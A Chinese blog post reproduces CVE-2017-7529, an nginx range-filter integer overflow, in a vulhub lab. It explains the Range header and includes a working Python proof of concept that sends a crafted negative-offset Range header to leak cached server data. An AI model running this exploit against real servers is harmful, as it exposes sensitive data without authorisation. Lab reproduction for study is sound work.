Nginx越界读取缓存漏洞(CVE-2017-7529)

最新推荐文章于 2024-05-13 12:16:03 发布
最新推荐文章于 2024-05-13 12:16:03 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 漏洞复现篇 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/126944659
版权

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

理论知识

range

        The Range 是一个请求首部,告知服务器返回文件的哪一部分。在一个 Range 首部中,可以一次性请求多个部分,服务器会以 multipart 文件的形式将其返回。如果服务器返回的是范围响应,需要使用 206 Partial Content 状态码。假如所请求的范围不合法,那么服务器会返回 416 Range Not Satisfiable 状态码,表示客户端错误。服务器允许忽略 Range 首部,从而返回整个文件,状态码用 200

range格式:

Range: <unit>=<range-start>-
Range: <unit>=<range-start>-<range-end>
Range: <unit>=<range-start>-<range-end>, <range-start>-<range-end>

range事例:

Range: bytes=500-999 //表示第 500-999 字节范围的内容
Range: bytes=-500  // 表示最后 500 字节的内容
Range: bytes=500- //表示从第 500 字节开始到文件结束部分的内容
Range: bytes=500-600,601-999 //同时指定几个范围

漏洞原理

        主要是因为在通过range读取缓存的时候,当我们构造了两个负值得位置,则我们可以读取到缓存文件中比敏感的服务器信息。

影响版本:Nginx 的 0.5.6 - 1.13.2版本

漏洞复现

一、vulhub搭建起靶场

 二、vulhub中有自带的poc

 三、直接python3   poc.py   http://your-ip:8080

 总结

        这个漏洞主要会导致敏感信息泄露,说实话没看到有啥敏感的信息,明白了为啥说这个漏洞比较废。但是嘞我们还是应该重视起来。

POC

import sys
import requests

if len(sys.argv) < 2:
    print("%s url" % (sys.argv[0]))
    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
    sys.exit()

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
    n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)
print(r.text)

参考文章:

Range - HTTP | MDNThe Range 是一个请求首部,告知服务器返回文件的哪一部分。在一个 Range 首部中,可以一次性请求多个部分,服务器会以 multipart 文件的形式将其返回。如果服务器返回的是范围响应,需要使用 206 Partial Content 状态码。假如所请求的范围不合法,那么服务器会返回 416 Range Not Satisfiable 状态码,表示客户端错误。服务器允许忽略 Range 首部,从而返回整个文件,状态码用 200 。https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Range

Nginx整数溢出漏洞CVE-2017-7529 - 知乎漏洞简介 NginxNginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个BSD-like 协议下发行。其特点是占有内存少,并发能力较强,Nginx 可以在大多数 UnixLinux OS 上编译运行…https://zhuanlan.zhihu.com/p/34155943

Nginx越界读取缓存漏洞(CVE-2017-7529)复现分析 - qweg_focus - 博客园Nginx越界读取缓存漏洞(CVE-2017-7529)复现分析 漏洞概述 ​在 Nginx 的 range filter 中存在整数溢出漏洞,可以通过带有特殊构造的 range 的 HTTP 头的https://www.cnblogs.com/qweg/p/16549957.html

Nginx配置——反向代理_止步前行的博客-CSDN博客_nginx反向代理Nginxhttps://blog.csdn.net/zxd1435513775/article/details/102508463

漏洞复现-CVE-2017-7529-敏感信息泄露 - 铺哩 - 博客园Nginx敏感信息泄露漏洞(CVE-2017-7529)https://www.cnblogs.com/cute-puli/p/13282355.html

不习惯有你
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-7529 Nginx越界读取缓存漏洞
凝聚力安全团队
01-26 4020
目录漏洞描述影响版本漏洞环境搭建漏洞原理漏洞利用漏洞加固参考链接 漏洞描述   从0.5.6到1.13.2(含)的Nginx版本容易受到nginx范围过滤器模块中整数溢出漏洞的攻击,从而导致特制请求触发的潜在敏感信息泄漏。 影响版本 Nginx 0.5.6 – 1.13.2 漏洞环境搭建 使用docker 启动vulhub中的CVE-2017-7529环境 docker快速入门以及漏洞环境搭建 漏洞原理 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,
nginx相关漏洞处理:CVE-2016-2183、CVE-2022-41741、CVE-2022-41742
大新新大浩浩的博客
09-19 7343
nginx相关漏洞处理:CVE-2016-2183、CVE-2022-41741、CVE-2022-41742
一份关于windows server服务器的安全漏洞处理建议(来自绿盟安全评估)_允许traceroute探测漏洞
最新发布
2301_82242326的博客
05-13 1097
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
nginx越界读取缓存漏洞CVE-2017-7529
u013008898的博客
02-12 701
主要是因为在通过range读取缓存的时候,当我们构造了两个负值得位置,则我们可以读取缓存文件中比敏感的服务器信息。Range: bytes=500- //表示从第 500 字节开始到文件结束部分的内容。Range: bytes=500-999 //表示第 500-999 字节范围的内容。Range: bytes=500-600,601-999 //同时指定几个范围。Range: bytes=-500 // 表示最后 500 字节的内容。在不影响业务的前提下,建议禁用multipart range功能。
CVE-2017-7529:Nginx敏感信息泄露 分析
Endeavour的博客
07-12 2322
2017年7月11日,Nginx官方发布最新的安全公告,漏洞CVE编号为CVE-2017-7529,该在nginx范围过滤器中发现了一个安全问题,通过精心构造的恶意请求可能会导致整数溢出并且不正确处理范围,可能导致敏感信息泄漏,存在安全风险。 具体详情如下: 漏洞编号: CVE-2017-7529 漏洞名称: Nginx敏感信息泄露漏洞 官方评级:
一份关于windows server服务器的安全漏洞处理建议(来自绿盟安全评估)
分享型博主
07-26 6800
文章来自一份绿盟安全评估中的服务器漏洞扫描分析结果,据市场研究公司Gartner研究报告称“实施漏洞管理的企业会避免近90%的攻击”。可以看出,及时的漏洞修补可以在一定程度上防止病毒、攻击者的威胁。这个报告是合作单位的服务器安全评估出来的,帮忙协助处理下,希望对看到的小伙伴有所帮助,有问题咱们一起讨论实践哦。
Nginx平滑升级记录
weixin_43012082的博客
06-03 2472
将新版本的启动文件复制到local/nginx/sbin里(需要先删除local/nginx/sbin/nginx,不放心就备份一下)然后把新包上传上去,解压(语句是将/home/hd/hd/nginx-1.24.0.tar.gz解压到/home/hd/opt)因为扫描到了Nginx漏洞,所以需要对Nginx升级,同时不影响原来的nginx配置。nginx 内存损坏漏洞 (CVE-2022-41741)nginx 内存泄漏漏洞(CVE-2022-41742)查看版本,如果是新版本,即为升级成功。
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将...
nginx-1.23.4安装服务启动
05-03
4. **缓存功能**:Nginx还可以作为缓存服务器,对常见请求提供快速响应,减轻后端服务器压力。 通过以上步骤和理解,您应该能够成功安装和启动Nginx 1.23.4,并了解其作为HTTP服务器和反向代理的基本功能。在实际...
nginx-1.13.3,nginx1.13.3不存在信息泄漏漏洞安全稳定nginx版本
10-09
Nginx 1.13.3 中,开发团队对这类漏洞进行了细致的排查和修复,确保用户在使用过程中不会遭遇此类问题。 **2. 稳定性** 稳定性是 Nginx 的核心优势之一。Nginx 1.13.3 版本经过了严格的测试和验证,确保在各种...
Nginx-Remote-Integer-Overflow-Vulnerability:CVE-2017-7529
04-13
**Nginx远程整数溢出漏洞CVE-2017-7529** 在2017年,Nginx服务器发现了一个严重的安全漏洞,被命名为CVE-2017-7529,它是一个远程整数溢出漏洞。这个漏洞主要影响了Nginx的HTTP模块,允许攻击者通过精心构造的...
nginx-1.4.0:用于CVE-2013-2028的分析
05-14
**Nginx 1.4.0 及 CVE-2013-2028 漏洞分析** Nginx 是一个流行的开源 Web 服务器,以其高性能、稳定性及低内存消耗而闻名。在 Nginx 1.4.0 版本中,存在一个名为 CVE-2013-2028 的安全漏洞,这个漏洞允许攻击者通过...
Nginx 配置错误导致漏洞 漏洞复现 (CRLF注入漏洞&目录穿越漏洞)
鸥鹭忘机
10-04 4569
CRLF注入漏洞 nginx的错误配置如下,该配置的用意是让http请求跳转到https请求。其中uri就是我们的访问的地址,该变量可控。其中‘https://uri就是我们的访问的地址,该变量可控。其中`https://uri就是我们的访问的地址,该变量可控。其中‘https://hosturi‘会出现在http响应报文中,这样我们就可以通过改变‘uri`会出现在http响应报文中,这样我们就可以通过改变`uri‘会出现在http响应报文中,这样我们就可以通过改变‘uri`来控制http的响应报文。 lo
C++ IO类 详解
LxymticS的博客
12-23 1707
C++ IO类 详解 文章目录C++ IO类 详解1. 其实还有别的IO类1.1 特点:IO对象无拷贝或赋值1.2 管理流的条件状态1.3 管理输出缓冲1.3.1 为什么?1.3.2 那么,什么情况下缓冲会刷新呢1.3.3 主动刷新输出缓冲区:1.3.4 关联输入和输出流2. 文件IO2.1 打开文件2.1.1 打开文件的方法2.1.2 文件模式2.1.3 判断打开是否成功2.2 读取内容2.3 关闭文件3. string流3.1 什么时候使用呢? 1. 其实还有别的IO类 你,是不是每次写C++的第一行都
Nginx CVE-2017-7529数组越界读取缓存漏洞
qq_43665434的博客
05-18 324
Nginx CVE-2017-7529数组越界读取缓存漏洞 漏洞原理:传送门 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击机 192.168.1.120 实验过程 启动漏洞靶机centos8 # 进入vulhub目录 cd /usr/sbin/vulhub/CVE-2017-7529/ # 开启docker服务 service docker start # 创建docker镜像 docker-compose build #
nginx安全漏洞(CVE-2021-23017)修复
热门推荐
皮皮虾的博客
07-26 5万+
nginx安全漏洞(CVE-2021-23017) 详细描述 Nginx是美国Nginx公司的一款轻量级Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器。 nginx存在安全漏洞,该漏洞源于一个离一错误在该漏洞允许远程攻击者可利用该漏洞在目标系统上执行任意代码。 受影响版本:0.6.18-1.20.0 解决办法 厂商补丁: 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https://www.nginx.com/blog/updating-nginx-dns-reso
Nginx 常见漏洞解决方式
qq_38951990的博客
06-23 4114
Nginx 隐藏版本信息 在一般的应用场景中我们需要隐藏掉Nginx的版本信息,因为攻击者可能会根据版本信息中的版本去找到相关版本的漏洞,然后利用这个漏洞对服务器进行攻击。 http { #不显示版本号 server_tokens off; } 配置前效果展示 添加配置的效果如下: ps:如果想要将响应头中的server中的nginx修改成其它的值,需要修改源文件。 vi src/http/ngx_http_header_filter_module.c # 49-50行 // 内
Nginx文件解析漏洞的原理与复现
LJH1999ZN的博客
03-30 7438
一、Nginx的简介 Nginx (engine x) 是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力在同类型的网页服务器中表现较好,中国大陆使用nginx网站用户有:百度、京东、新浪、网易、腾讯、淘宝等 二、Nginx漏洞的原理 1,Nginx越界读取缓存漏洞CVE-2017-7529) 可以读取缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”
nginx 越界写入漏洞CVE-2022-41742)
05-19
CVE-2022-41742是针对Nginx越界写入漏洞,该漏洞可能导致攻击者在特定环境下执行任意代码或导致拒绝服务攻击。该漏洞影响版本为Nginx 1.21.0至1.21.2。 攻击者可以通过构造特定的HTTP请求,利用该漏洞来进行攻击。Nginx已经发布了针对该漏洞的修复版本,建议用户尽快升级到最新版本以避免受到攻击。 同时,为了减少风险,管理员还应该采取其他安全措施,包括但不限于: 1. 使用防火墙来限制对Nginx的访问; 2. 启用Nginx的访问日志和错误日志,及时发现异常情况; 3. 防止未经授权的用户访问服务器; 4. 及时备份数据,以便在攻击发生时能够迅速恢复数据。 总之,针对该漏洞,用户需要采取一系列安全措施来保护自己的系统不受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值